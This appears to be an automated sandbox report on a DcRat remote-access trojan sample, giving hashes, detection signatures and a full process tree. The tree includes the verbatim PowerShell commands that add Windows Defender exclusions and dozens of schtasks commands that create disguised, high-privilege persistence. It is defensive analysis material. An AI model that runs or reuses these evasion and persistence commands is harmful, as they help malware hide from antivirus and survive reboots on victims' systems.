Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    21-12-2024 20:46

General

  • Target

    JaffaCakes118_2d38e2d2b3e13da39dfbeed8612fe37747722846b0d75495dbfaf73a7eb75e3a.exe

  • Size

    1.3MB

  • MD5

    32615ad6080d8fe652230bb4c70496a7

  • SHA1

    5dd7ca55e4d479aa054309f78225262ed35cc1d3

  • SHA256

    2d38e2d2b3e13da39dfbeed8612fe37747722846b0d75495dbfaf73a7eb75e3a

  • SHA512

    e8e79f81e355354d1cef17cf101fe2d815cb0b0147ef9cbb573d8cbf3fb1d847ffcbf7735d8a5b5bbc1379727de1cd72454ef45d87f9c9605a65beb2b90ce8e4

  • SSDEEP

    24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 39 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 8 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 39 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_2d38e2d2b3e13da39dfbeed8612fe37747722846b0d75495dbfaf73a7eb75e3a.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_2d38e2d2b3e13da39dfbeed8612fe37747722846b0d75495dbfaf73a7eb75e3a.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\providercommon\1zu9dW.bat" "
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2292
        • C:\providercommon\DllCommonsvc.exe
          "C:\providercommon\DllCommonsvc.exe"
          4⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2940
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1992
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\conhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2488
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\System.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2204
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Journal\es-ES\lsass.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:696
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\sppsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1408
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Libraries\csrss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:112
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\System.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:688
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\lsm.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2220
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Recent\dwm.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2000
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\explorer.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:324
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\NetHood\System.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3024
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\System\audiodg.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1052
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\csrss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1432
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\lsass.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1460
          • C:\Users\Default User\conhost.exe
            "C:\Users\Default User\conhost.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2056
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gQkyN2upze.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1316
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                  PID:3012
                • C:\Users\Default User\conhost.exe
                  "C:\Users\Default User\conhost.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2692
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5irhJyFUC1.bat"
                    8⤵
                      PID:2568
                      • C:\Windows\system32\w32tm.exe
                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        9⤵
                          PID:2152
                        • C:\Users\Default User\conhost.exe
                          "C:\Users\Default User\conhost.exe"
                          9⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1472
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xjNnGM38uG.bat"
                            10⤵
                              PID:2180
                              • C:\Windows\system32\w32tm.exe
                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                11⤵
                                  PID:1912
                                • C:\Users\Default User\conhost.exe
                                  "C:\Users\Default User\conhost.exe"
                                  11⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1588
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DegeIw2hse.bat"
                                    12⤵
                                      PID:1120
                                      • C:\Windows\system32\w32tm.exe
                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                        13⤵
                                          PID:2412
                                        • C:\Users\Default User\conhost.exe
                                          "C:\Users\Default User\conhost.exe"
                                          13⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:900
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wKGJ2NUoAL.bat"
                                            14⤵
                                              PID:1692
                                              • C:\Windows\system32\w32tm.exe
                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                15⤵
                                                  PID:2572
                                                • C:\Users\Default User\conhost.exe
                                                  "C:\Users\Default User\conhost.exe"
                                                  15⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2036
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wHaMzi6eYE.bat"
                                                    16⤵
                                                      PID:1560
                                                      • C:\Windows\system32\w32tm.exe
                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        17⤵
                                                          PID:2820
                                                        • C:\Users\Default User\conhost.exe
                                                          "C:\Users\Default User\conhost.exe"
                                                          17⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2180
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cxnNEsMM51.bat"
                                                            18⤵
                                                              PID:2852
                                                              • C:\Windows\system32\w32tm.exe
                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                19⤵
                                                                  PID:2772
                                                                • C:\Users\Default User\conhost.exe
                                                                  "C:\Users\Default User\conhost.exe"
                                                                  19⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1524
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6uGRILFBWR.bat"
                                                                    20⤵
                                                                      PID:2992
                                                                      • C:\Windows\system32\w32tm.exe
                                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                        21⤵
                                                                          PID:2520
                                                                        • C:\Users\Default User\conhost.exe
                                                                          "C:\Users\Default User\conhost.exe"
                                                                          21⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3000
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wRWwqJyPGw.bat"
                                                                            22⤵
                                                                              PID:112
                                                                              • C:\Windows\system32\w32tm.exe
                                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                23⤵
                                                                                  PID:2232
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\conhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2600
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3012
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2964
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\providercommon\System.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2756
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2704
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2608
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Journal\es-ES\lsass.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2180
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\es-ES\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2900
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Journal\es-ES\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2152
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Portable Devices\sppsvc.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1484
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\sppsvc.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:376
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Portable Devices\sppsvc.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2120
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\csrss.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:336
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Public\Libraries\csrss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1616
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\csrss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1644
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\providercommon\System.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1196
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2012
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:800
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\lsm.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1012
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1548
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1808
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Recent\dwm.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2960
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Admin\Recent\dwm.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2788
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Recent\dwm.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2952
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Windows\System32\explorer.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2972
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\System32\explorer.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2268
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\System32\explorer.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2792
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\NetHood\System.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2344
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\NetHood\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1132
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\NetHood\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2448
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Windows\Vss\Writers\System\audiodg.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2784
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Windows\Vss\Writers\System\audiodg.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:832
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\Windows\Vss\Writers\System\audiodg.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:964
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\csrss.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2316
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\csrss.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1252
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\csrss.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2920
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\lsass.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2272
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\lsass.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:900
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\lsass.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1688

Network

MITRE ATT&CK Enterprise v15

Downloads
